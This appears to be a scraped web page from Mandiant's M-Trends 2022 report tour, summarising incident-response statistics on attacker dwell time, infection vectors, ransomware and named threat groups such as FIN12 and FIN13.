MANDIANT SPECIAL REPORT TOUR
M-Trends is an annual report that provides the latest frontline incident response and threat intelligence findings from high-impact cyber attacks and global remediations.
Our 2022 edition is based on Mandiant investigations and engagements performed from October 1, 2020 through December 31, 2021.
Scroll down to explore a sample of the findings in this online tour or download the full report.
How are they found?
When are attackers found?
Where do they attack?
What do they target?
Who are today's attackers?
GET THE REPORT
© Copyright 2021 Mandiant. All rights reserved.
FOLLOW MANDIANT
Contact Us
Report An Incident
CONNECT WITH MANDIANT
Advantage Platform
Managed Defense
Mandiant Services
Mandiant Academy
PRODUCT AND SERVICES
COMPANY
About Mandiant
Media Center
Discover more details, learnings and mitigation strategies
READ THE FULL REPORT
UNC2891
Mandiant has observed UNC2891 targeting Linux and Unix environments, with a strong focus on Oracle Solaris-based systems.
This threat group uses its vast knowledge of Linux/Unix to remain hidden (sometimes for years) as it moves within an environment.
UNC2891 achieves their mission in part through the use of custom backdoors that target Linux authentication modules and the use of custom malware to evade detection.
More recently, UNC2891 has also begun targeting ATMs for financial gain using sophisticated Linux-targeting malware.
FIN13
UNC886 graduated to FIN13, a financially motivated threat group that has been active since 2016 and targets organizations based in Mexico.
FIN13 monetizes intrusions by collecting information required to conduct fraudulent financial transfers from company point-of-sale (POS) systems and ATMs into attacker-controlled accounts (a relatively unique approach). They can persist in victim environments for several years.
They have shifted from the near-exclusive use of traditional web shells to BLUEAGAVE (a PowerShell or Perl-based passive backdoor).
Regional targeting has been more common within Latin American cyber crime communities. Many of the publicly available tools and web shells used by FIN13 were modified to contain Spanish-language
code elements.
FIN12
UNC1878 graduated to FIN12, a financially motivated threat group behind prolific RYUK ransomware attacks since 2018. FIN12 intrusions comprised nearly 20% of Mandiant ransomware investigations during this reporting period.
FIN12 prioritizes rapid ransomware deployment.
FIN12 relies heavily on partners to obtain initial access into victim environments.
As of February 2020, FIN12 used Cobalt Strike BEACON payloads in nearly every intrusion.
Mandiant expects FIN12 to broaden its regional focus from the U.S. to other nations. including Western Europe and Asia-Pacific.
NOTABLE AND RECENTLY GRADUATED THREAT GROUPS
THREAT GROUPS 2021
Cluster of cyber intrusion activity with observable artifacts that requires further analysis before providing specific classification.
Unclassified Threat Groups
Financially Motivated Threat Actor
• Mandiant tracked 1,141 UNC groups, 13 FIN groups and 40 APT groups in 2021
WHO ARE TODAY'S
ATTACKERS?
In 2021, Mandiant observed a high volume of compromises attributed to vulnerabilities and misconfigurations in on-premises Active Directory and cloud-based infrastructures, resulting in an expanded attack surface for successful privilege escalation and both lateral and vertical movement
by attackers.
THE TOP 5 MOST TARGETED INDUSTRIES
Active Directory Misconfigurations
What do they target?
DATA THEFT
Attackers continue to prioritize data theft as a primary mission objective.
29% of intrusions involved data theft in 2021, a 3-point decrease from 2020.
FINANCIAL GAIN
3 out of 10 intrusions stemmed from attackers seeking monetary gain through methods such as extortion, ransom, payment card theft and illicit transfers.
Financially motivated attacks dropped to 30% in 2021 compared to 38% in 2021.
A likely contributing factor for this decrease in 2021 was an increase in law enforcement action leading to arrests, takedown of servers and seizure of extorted funds.
MITRE ATT&CK
70% of MITRE ATT&CK techniques and 46% of sub-techniques were used by attackers.
30% of all techniques seen in more than 5% of intrusions.
Exploits remained the most frequently identified initial infection vector
In 37% of intrusions, attackers leveraged exploits to gain access
Eight-point increase in intrusions commencing with an exploit, compared to 2020
Exploits
Supply chain compromise was the second most prevalent initial infection vector
Accounting for 17% of intrusions with an identified vector
86% of these intrusions were related to the SolarWinds breach and SUNBURST
SUPply chain compromise
Prior compromise (handoffs from one group to another and past malware infections) grew as an initial infection vector, accounting for 14% in 2021
PRIOR COMPROMISE
Phishing intrusions dropped to 11% in 2021 compared to 23% in 2020-
a 12-point decrease from previous reporting period
Organizations are better at detecting and blocking this infection vector with enhanced employee training to recognize and report phishing attempts
PHISHING INTRUSIONS
Initial Infection Vector, 2021
Intrusions saw adversaries use obfuscation (such as encryption or encoding) to make detection and subseqeunt analysis more difficult.
Where do they attack?
Regional Dwell Time and Ransomware Highlights
Global Median Dwell Time, 2011-2021
Change in Global Median Dwell Time
DAYS IN 2020
DAYS IN 2021
24
21
Since 2011, global median dwell time has dropped from over
ONE YEAR to less than ONE MONTH.
And in the last year alone, global median dwell time dropped to
21 DAYS—even 3 percentage points lower than 2020.
When are attackers found?
Detection by Source by Region, 2021
GLOBAL Detection by Source, 2011-2021
Internal detection by organizations has a median dwell time of 18 days compared to 28 days for external notification. The percentage of intrusions detected internally trended upwards with moderate fluctuation over te last six years.
How are they found?
The number of days an attacker is present in a target’s environment before they are detected.
Global Median Dwell Time
Discover more details, learnings and mitigation strategies
READ THE FULL REPORT
Most targeted industries in 2021
Discover more details, Learnings and mitigation strategies
READ THE FULL REPORT
internal detection
Internal detection is when an organization independently discovers it has been compromised.
external notification
External notification is when an outside entity informs an organization of compromise (including notification by an attacker via extortion note).
•
•
•
•
•
•
•
Internal detection in 2021 (18 days) was significantly faster than external notifications, but slower compared to 2020 (12 days) Mandiant is not surprised by this data because last represented an all-time low.
External notifications were reported in half the time in 2021 compared to 2020. This is due in part to improved information sharing capabilities and communication mechanisms
In APAC and EMEA, most intrusions were identified externally in 2021—a reversal of what was observed in 2020.
In the Americas, detection by source held steady with most intrusions detected internally.
Scroll for more
•
Threat Actors Focused on Espionage Activities
*Mandiant tracks Advanced Persistent Threat (APT) groups 0-41. Over the years, APT 11 and APT 13 were merged into other groups and subsequently deprecated resulting in
40 APT groups actively tracked by Mandiant.
The most targeted industries remain generally consistent each year, but their relative rankings do change.
READ THE FULL REPORT
50%+
Attackers use what they find in victim environments. Most frequently observed sub-techniques were web protocols (32%), PowerShell (29.4%), file deletion (27.1%), system services (26.5%), and Remote Desktop Protocol (23.4%).
Americas
Median dwell time remained constant at 17 days in 2021 compared to 2020
22% of intrusions were related to ransomware
APAC
Median dwell time was 21 days in 2021 compared to 76 days in 2020—a 72% improvement
38% of intrusions in 2021 were ransomware-related—compared to only 12.5% in 2020
EMEA
Median dwell time was 48 days in 2021 compared to 66 days in 2020
Fewer investigations were ransomware-related—17% in 2021 compared to 22% in 2020
Median Dwell Time
DAYS
5
For all ransomware investigations:
FIN12:
DAYS
2
LESS THAN
Monetized operations via methods such as, but not exclusive to ransomware deployment and payment card data theft.
Two new FIN groups were named
One new, significant UNC group was announced
•
•
•
•
•
•
•
•
•
•
•
•
•
Discover more details, learnings and mitigation strategies
READ THE FULL REPORT
Discover more details, learnings and mitigation strategies
READ THE FULL REPORT
FOLLOW MANDIANT
COMPANY
About Mandiant
Media Center
Advantage Platform
Managed Defense
Mandiant Services
Mandiant Academy
Contact Us
Report An Incident
© Copyright 2022 Mandiant. All rights reserved.
PRODUCT AND SERVICES
CONNECT WITH MANDIANT
Mandiant tracked 1,141 UNC groups, 13 FIN groups and 40 APT groups in 2021
•
